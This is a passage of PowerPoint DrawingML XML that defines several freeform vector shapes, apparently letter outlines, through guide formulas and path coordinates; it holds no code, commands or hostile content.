                  <a:gd name="T55" fmla="*/ 115 h 178"/>
                  <a:gd name="T56" fmla="*/ 53 w 133"/>
                  <a:gd name="T57" fmla="*/ 133 h 178"/>
                  <a:gd name="T58" fmla="*/ 70 w 133"/>
                  <a:gd name="T59" fmla="*/ 142 h 178"/>
                  <a:gd name="T60" fmla="*/ 88 w 133"/>
                  <a:gd name="T61" fmla="*/ 150 h 178"/>
                  <a:gd name="T62" fmla="*/ 88 w 133"/>
                  <a:gd name="T63" fmla="*/ 150 h 178"/>
                  <a:gd name="T64" fmla="*/ 114 w 133"/>
                  <a:gd name="T65" fmla="*/ 150 h 178"/>
                  <a:gd name="T66" fmla="*/ 132 w 133"/>
                  <a:gd name="T67" fmla="*/ 142 h 178"/>
                  <a:gd name="T68" fmla="*/ 132 w 133"/>
                  <a:gd name="T69" fmla="*/ 168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33" h="178">
                    <a:moveTo>
                      <a:pt x="132" y="168"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="132" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="168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16" name="Freeform 32"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5218113" y="3675063"/>
                <a:ext cx="53975" cy="88900"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 36 w 152"/>
                  <a:gd name="T1" fmla="*/ 159 h 248"/>
                  <a:gd name="T2" fmla="*/ 36 w 152"/>
                  <a:gd name="T3" fmla="*/ 159 h 248"/>
                  <a:gd name="T4" fmla="*/ 36 w 152"/>
                  <a:gd name="T5" fmla="*/ 159 h 248"/>
                  <a:gd name="T6" fmla="*/ 53 w 152"/>
                  <a:gd name="T7" fmla="*/ 141 h 248"/>
                  <a:gd name="T8" fmla="*/ 98 w 152"/>
                  <a:gd name="T9" fmla="*/ 79 h 248"/>
                  <a:gd name="T10" fmla="*/ 142 w 152"/>
                  <a:gd name="T11" fmla="*/ 79 h 248"/>
                  <a:gd name="T12" fmla="*/ 71 w 152"/>
                  <a:gd name="T13" fmla="*/ 150 h 248"/>
                  <a:gd name="T14" fmla="*/ 151 w 152"/>
                  <a:gd name="T15" fmla="*/ 247 h 248"/>
                  <a:gd name="T16" fmla="*/ 106 w 152"/>
                  <a:gd name="T17" fmla="*/ 247 h 248"/>
                  <a:gd name="T18" fmla="*/ 53 w 152"/>
                  <a:gd name="T19" fmla="*/ 168 h 248"/>
                  <a:gd name="T20" fmla="*/ 36 w 152"/>
                  <a:gd name="T21" fmla="*/ 185 h 248"/>
                  <a:gd name="T22" fmla="*/ 36 w 152"/>
                  <a:gd name="T23" fmla="*/ 247 h 248"/>
                  <a:gd name="T24" fmla="*/ 0 w 152"/>
                  <a:gd name="T25" fmla="*/ 247 h 248"/>
                  <a:gd name="T26" fmla="*/ 0 w 152"/>
                  <a:gd name="T27" fmla="*/ 0 h 248"/>
                  <a:gd name="T28" fmla="*/ 36 w 152"/>
                  <a:gd name="T29" fmla="*/ 0 h 248"/>
                  <a:gd name="T30" fmla="*/ 36 w 152"/>
                  <a:gd name="T31" fmla="*/ 159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2" h="248">
                    <a:moveTo>
                      <a:pt x="36" y="159"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="36" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="159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17" name="Freeform 33"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4929188" y="3829050"/>
                <a:ext cx="73025" cy="85725"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 79 w 204"/>
                  <a:gd name="T1" fmla="*/ 239 h 240"/>
                  <a:gd name="T2" fmla="*/ 0 w 204"/>
                  <a:gd name="T3" fmla="*/ 0 h 240"/>
                  <a:gd name="T4" fmla="*/ 35 w 204"/>
                  <a:gd name="T5" fmla="*/ 0 h 240"/>
                  <a:gd name="T6" fmla="*/ 71 w 204"/>
                  <a:gd name="T7" fmla="*/ 124 h 240"/>
                  <a:gd name="T8" fmla="*/ 71 w 204"/>
                  <a:gd name="T9" fmla="*/ 124 h 240"/>
                  <a:gd name="T10" fmla="*/ 97 w 204"/>
                  <a:gd name="T11" fmla="*/ 212 h 240"/>
                  <a:gd name="T12" fmla="*/ 97 w 204"/>
                  <a:gd name="T13" fmla="*/ 212 h 240"/>
                  <a:gd name="T14" fmla="*/ 97 w 204"/>
                  <a:gd name="T15" fmla="*/ 212 h 240"/>
                  <a:gd name="T16" fmla="*/ 124 w 204"/>
                  <a:gd name="T17" fmla="*/ 124 h 240"/>
                  <a:gd name="T18" fmla="*/ 168 w 204"/>
                  <a:gd name="T19" fmla="*/ 0 h 240"/>
                  <a:gd name="T20" fmla="*/ 203 w 204"/>
                  <a:gd name="T21" fmla="*/ 0 h 240"/>
                  <a:gd name="T22" fmla="*/ 115 w 204"/>
                  <a:gd name="T23" fmla="*/ 239 h 240"/>
                  <a:gd name="T24" fmla="*/ 79 w 204"/>
                  <a:gd name="T25" fmla="*/ 239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04" h="240">
                    <a:moveTo>
                      <a:pt x="79" y="239"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="239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18" name="Freeform 34"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5002213" y="3854450"/>
                <a:ext cx="53975" cy="63500"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 27 w 150"/>
                  <a:gd name="T1" fmla="*/ 88 h 178"/>
                  <a:gd name="T2" fmla="*/ 27 w 150"/>
                  <a:gd name="T3" fmla="*/ 88 h 178"/>
                  <a:gd name="T4" fmla="*/ 35 w 150"/>
                  <a:gd name="T5" fmla="*/ 115 h 178"/>
                  <a:gd name="T6" fmla="*/ 44 w 150"/>
                  <a:gd name="T7" fmla="*/ 133 h 178"/>
                  <a:gd name="T8" fmla="*/ 62 w 150"/>
                  <a:gd name="T9" fmla="*/ 150 h 178"/>
                  <a:gd name="T10" fmla="*/ 88 w 150"/>
                  <a:gd name="T11" fmla="*/ 150 h 178"/>
                  <a:gd name="T12" fmla="*/ 88 w 150"/>
                  <a:gd name="T13" fmla="*/ 150 h 178"/>
                  <a:gd name="T14" fmla="*/ 114 w 150"/>
                  <a:gd name="T15" fmla="*/ 150 h 178"/>
                  <a:gd name="T16" fmla="*/ 131 w 150"/>
                  <a:gd name="T17" fmla="*/ 141 h 178"/>
                  <a:gd name="T18" fmla="*/ 140 w 150"/>
                  <a:gd name="T19" fmla="*/ 159 h 178"/>
                  <a:gd name="T20" fmla="*/ 140 w 150"/>
                  <a:gd name="T21" fmla="*/ 159 h 178"/>
                  <a:gd name="T22" fmla="*/ 114 w 150"/>
                  <a:gd name="T23" fmla="*/ 168 h 178"/>
                  <a:gd name="T24" fmla="*/ 80 w 150"/>
                  <a:gd name="T25" fmla="*/ 177 h 178"/>
                  <a:gd name="T26" fmla="*/ 80 w 150"/>
                  <a:gd name="T27" fmla="*/ 177 h 178"/>
                  <a:gd name="T28" fmla="*/ 44 w 150"/>
                  <a:gd name="T29" fmla="*/ 168 h 178"/>
                  <a:gd name="T30" fmla="*/ 18 w 150"/>
                  <a:gd name="T31" fmla="*/ 150 h 178"/>
                  <a:gd name="T32" fmla="*/ 0 w 150"/>
                  <a:gd name="T33" fmla="*/ 124 h 178"/>
                  <a:gd name="T34" fmla="*/ 0 w 150"/>
                  <a:gd name="T35" fmla="*/ 88 h 178"/>
                  <a:gd name="T36" fmla="*/ 0 w 150"/>
                  <a:gd name="T37" fmla="*/ 88 h 178"/>
                  <a:gd name="T38" fmla="*/ 0 w 150"/>
                  <a:gd name="T39" fmla="*/ 53 h 178"/>
                  <a:gd name="T40" fmla="*/ 18 w 150"/>
                  <a:gd name="T41" fmla="*/ 27 h 178"/>
                  <a:gd name="T42" fmla="*/ 44 w 150"/>
                  <a:gd name="T43" fmla="*/ 0 h 178"/>
                  <a:gd name="T44" fmla="*/ 80 w 150"/>
                  <a:gd name="T45" fmla="*/ 0 h 178"/>
                  <a:gd name="T46" fmla="*/ 80 w 150"/>
                  <a:gd name="T47" fmla="*/ 0 h 178"/>
                  <a:gd name="T48" fmla="*/ 114 w 150"/>
                  <a:gd name="T49" fmla="*/ 0 h 178"/>
                  <a:gd name="T50" fmla="*/ 131 w 150"/>
                  <a:gd name="T51" fmla="*/ 27 h 178"/>
                  <a:gd name="T52" fmla="*/ 140 w 150"/>
                  <a:gd name="T53" fmla="*/ 53 h 178"/>
                  <a:gd name="T54" fmla="*/ 149 w 150"/>
                  <a:gd name="T55" fmla="*/ 80 h 178"/>
                  <a:gd name="T56" fmla="*/ 149 w 150"/>
                  <a:gd name="T57" fmla="*/ 80 h 178"/>
                  <a:gd name="T58" fmla="*/ 149 w 150"/>
                  <a:gd name="T59" fmla="*/ 88 h 178"/>
                  <a:gd name="T60" fmla="*/ 27 w 150"/>
                  <a:gd name="T61" fmla="*/ 88 h 178"/>
                  <a:gd name="T62" fmla="*/ 114 w 150"/>
                  <a:gd name="T63" fmla="*/ 71 h 178"/>
                  <a:gd name="T64" fmla="*/ 114 w 150"/>
                  <a:gd name="T65" fmla="*/ 71 h 178"/>
                  <a:gd name="T66" fmla="*/ 114 w 150"/>
                  <a:gd name="T67" fmla="*/ 53 h 178"/>
                  <a:gd name="T68" fmla="*/ 106 w 150"/>
                  <a:gd name="T69" fmla="*/ 35 h 178"/>
                  <a:gd name="T70" fmla="*/ 97 w 150"/>
                  <a:gd name="T71" fmla="*/ 27 h 178"/>
                  <a:gd name="T72" fmla="*/ 80 w 150"/>
                  <a:gd name="T73" fmla="*/ 18 h 178"/>
                  <a:gd name="T74" fmla="*/ 80 w 150"/>
                  <a:gd name="T75" fmla="*/ 18 h 178"/>
                  <a:gd name="T76" fmla="*/ 53 w 150"/>
                  <a:gd name="T77" fmla="*/ 27 h 178"/>
                  <a:gd name="T78" fmla="*/ 44 w 150"/>
                  <a:gd name="T79" fmla="*/ 35 h 178"/>
                  <a:gd name="T80" fmla="*/ 35 w 150"/>
                  <a:gd name="T81" fmla="*/ 53 h 178"/>
                  <a:gd name="T82" fmla="*/ 27 w 150"/>
                  <a:gd name="T83" fmla="*/ 71 h 178"/>
                  <a:gd name="T84" fmla="*/ 114 w 150"/>
                  <a:gd name="T85" fmla="*/ 71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50" h="178">
                    <a:moveTo>
                      <a:pt x="27" y="88"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="27" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="88"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="114" y="71"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="114" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="71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19" name="Freeform 35"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5065713" y="3854450"/>
                <a:ext cx="47625" cy="63500"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 132 w 133"/>
                  <a:gd name="T1" fmla="*/ 168 h 178"/>
                  <a:gd name="T2" fmla="*/ 132 w 133"/>
                  <a:gd name="T3" fmla="*/ 168 h 178"/>
                  <a:gd name="T4" fmla="*/ 114 w 133"/>
                  <a:gd name="T5" fmla="*/ 168 h 178"/>
                  <a:gd name="T6" fmla="*/ 79 w 133"/>
                  <a:gd name="T7" fmla="*/ 177 h 178"/>
                  <a:gd name="T8" fmla="*/ 79 w 133"/>
                  <a:gd name="T9" fmla="*/ 177 h 178"/>
                  <a:gd name="T10" fmla="*/ 44 w 133"/>
                  <a:gd name="T11" fmla="*/ 168 h 178"/>
                  <a:gd name="T12" fmla="*/ 17 w 133"/>
                  <a:gd name="T13" fmla="*/ 150 h 178"/>
                  <a:gd name="T14" fmla="*/ 0 w 133"/>
                  <a:gd name="T15" fmla="*/ 124 h 178"/>
                  <a:gd name="T16" fmla="*/ 0 w 133"/>
                  <a:gd name="T17" fmla="*/ 88 h 178"/>
                  <a:gd name="T18" fmla="*/ 0 w 133"/>
                  <a:gd name="T19" fmla="*/ 88 h 178"/>
                  <a:gd name="T20" fmla="*/ 8 w 133"/>
                  <a:gd name="T21" fmla="*/ 53 h 178"/>
                  <a:gd name="T22" fmla="*/ 26 w 133"/>
                  <a:gd name="T23" fmla="*/ 18 h 178"/>
                  <a:gd name="T24" fmla="*/ 53 w 133"/>
                  <a:gd name="T25" fmla="*/ 0 h 178"/>
                  <a:gd name="T26" fmla="*/ 88 w 133"/>
                  <a:gd name="T27" fmla="*/ 0 h 178"/>
                  <a:gd name="T28" fmla="*/ 88 w 133"/>
                  <a:gd name="T29" fmla="*/ 0 h 178"/>
                  <a:gd name="T30" fmla="*/ 114 w 133"/>
                  <a:gd name="T31" fmla="*/ 0 h 178"/>
                  <a:gd name="T32" fmla="*/ 132 w 133"/>
                  <a:gd name="T33" fmla="*/ 9 h 178"/>
                  <a:gd name="T34" fmla="*/ 123 w 133"/>
                  <a:gd name="T35" fmla="*/ 27 h 178"/>
                  <a:gd name="T36" fmla="*/ 123 w 133"/>
                  <a:gd name="T37" fmla="*/ 27 h 178"/>
                  <a:gd name="T38" fmla="*/ 114 w 133"/>
                  <a:gd name="T39" fmla="*/ 27 h 178"/>
                  <a:gd name="T40" fmla="*/ 88 w 133"/>
                  <a:gd name="T41" fmla="*/ 18 h 178"/>
                  <a:gd name="T42" fmla="*/ 88 w 133"/>
                  <a:gd name="T43" fmla="*/ 18 h 178"/>
                  <a:gd name="T44" fmla="*/ 61 w 133"/>
                  <a:gd name="T45" fmla="*/ 27 h 178"/>
                  <a:gd name="T46" fmla="*/ 44 w 133"/>
                  <a:gd name="T47" fmla="*/ 35 h 178"/>
                  <a:gd name="T48" fmla="*/ 35 w 133"/>
                  <a:gd name="T49" fmla="*/ 62 h 178"/>
                  <a:gd name="T50" fmla="*/ 26 w 133"/>
                  <a:gd name="T51" fmla="*/ 88 h 178"/>
                  <a:gd name="T52" fmla="*/ 26 w 133"/>
                  <a:gd name="T53" fmla="*/ 88 h 178"/>
                  <a:gd name="T54" fmla="*/ 35 w 133"/>
                  <a:gd name="T55" fmla="*/ 115 h 178"/>
                  <a:gd name="T56" fmla="*/ 44 w 133"/>
                  <a:gd name="T57" fmla="*/ 133 h 178"/>
                  <a:gd name="T58" fmla="*/ 61 w 133"/>
                  <a:gd name="T59" fmla="*/ 141 h 178"/>
                  <a:gd name="T60" fmla="*/ 88 w 133"/>
                  <a:gd name="T61" fmla="*/ 150 h 178"/>
                  <a:gd name="T62" fmla="*/ 88 w 133"/>
                  <a:gd name="T63" fmla="*/ 150 h 178"/>
                  <a:gd name="T64" fmla="*/ 114 w 133"/>
                  <a:gd name="T65" fmla="*/ 150 h 178"/>
                  <a:gd name="T66" fmla="*/ 123 w 133"/>
                  <a:gd name="T67" fmla="*/ 141 h 178"/>
                  <a:gd name="T68" fmla="*/ 132 w 133"/>
                  <a:gd name="T69" fmla="*/ 168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33" h="178">
                    <a:moveTo>
                      <a:pt x="132" y="168"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="132" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="168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20" name="Freeform 36"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5119688" y="3835400"/>
                <a:ext cx="38100" cy="82550"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 62 w 107"/>
                  <a:gd name="T1" fmla="*/ 0 h 231"/>
                  <a:gd name="T2" fmla="*/ 62 w 107"/>
                  <a:gd name="T3" fmla="*/ 53 h 231"/>
                  <a:gd name="T4" fmla="*/ 106 w 107"/>
                  <a:gd name="T5" fmla="*/ 53 h 231"/>
                  <a:gd name="T6" fmla="*/ 106 w 107"/>
                  <a:gd name="T7" fmla="*/ 80 h 231"/>
                  <a:gd name="T8" fmla="*/ 62 w 107"/>
                  <a:gd name="T9" fmla="*/ 80 h 231"/>
                  <a:gd name="T10" fmla="*/ 62 w 107"/>
                  <a:gd name="T11" fmla="*/ 168 h 231"/>
                  <a:gd name="T12" fmla="*/ 62 w 107"/>
                  <a:gd name="T13" fmla="*/ 168 h 231"/>
                  <a:gd name="T14" fmla="*/ 62 w 107"/>
                  <a:gd name="T15" fmla="*/ 194 h 231"/>
                  <a:gd name="T16" fmla="*/ 70 w 107"/>
                  <a:gd name="T17" fmla="*/ 203 h 231"/>
                  <a:gd name="T18" fmla="*/ 79 w 107"/>
                  <a:gd name="T19" fmla="*/ 203 h 231"/>
                  <a:gd name="T20" fmla="*/ 79 w 107"/>
                  <a:gd name="T21" fmla="*/ 203 h 231"/>
                  <a:gd name="T22" fmla="*/ 106 w 107"/>
                  <a:gd name="T23" fmla="*/ 203 h 231"/>
                  <a:gd name="T24" fmla="*/ 106 w 107"/>
                  <a:gd name="T25" fmla="*/ 221 h 231"/>
                  <a:gd name="T26" fmla="*/ 106 w 107"/>
                  <a:gd name="T27" fmla="*/ 221 h 231"/>
                  <a:gd name="T28" fmla="*/ 79 w 107"/>
                  <a:gd name="T29" fmla="*/ 230 h 231"/>
                  <a:gd name="T30" fmla="*/ 79 w 107"/>
                  <a:gd name="T31" fmla="*/ 230 h 231"/>
                  <a:gd name="T32" fmla="*/ 53 w 107"/>
                  <a:gd name="T33" fmla="*/ 221 h 231"/>
                  <a:gd name="T34" fmla="*/ 44 w 107"/>
                  <a:gd name="T35" fmla="*/ 212 h 231"/>
                  <a:gd name="T36" fmla="*/ 44 w 107"/>
                  <a:gd name="T37" fmla="*/ 212 h 231"/>
                  <a:gd name="T38" fmla="*/ 35 w 107"/>
                  <a:gd name="T39" fmla="*/ 194 h 231"/>
                  <a:gd name="T40" fmla="*/ 26 w 107"/>
                  <a:gd name="T41" fmla="*/ 168 h 231"/>
                  <a:gd name="T42" fmla="*/ 26 w 107"/>
                  <a:gd name="T43" fmla="*/ 80 h 231"/>
                  <a:gd name="T44" fmla="*/ 0 w 107"/>
                  <a:gd name="T45" fmla="*/ 80 h 231"/>
                  <a:gd name="T46" fmla="*/ 0 w 107"/>
                  <a:gd name="T47" fmla="*/ 53 h 231"/>
                  <a:gd name="T48" fmla="*/ 26 w 107"/>
                  <a:gd name="T49" fmla="*/ 53 h 231"/>
                  <a:gd name="T50" fmla="*/ 26 w 107"/>
                  <a:gd name="T51" fmla="*/ 9 h 231"/>
                  <a:gd name="T52" fmla="*/ 62 w 107"/>
                  <a:gd name="T53" fmla="*/ 0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07" h="231">
                    <a:moveTo>
                      <a:pt x="62" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="62" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="80"/>
                    </a:lnTo>
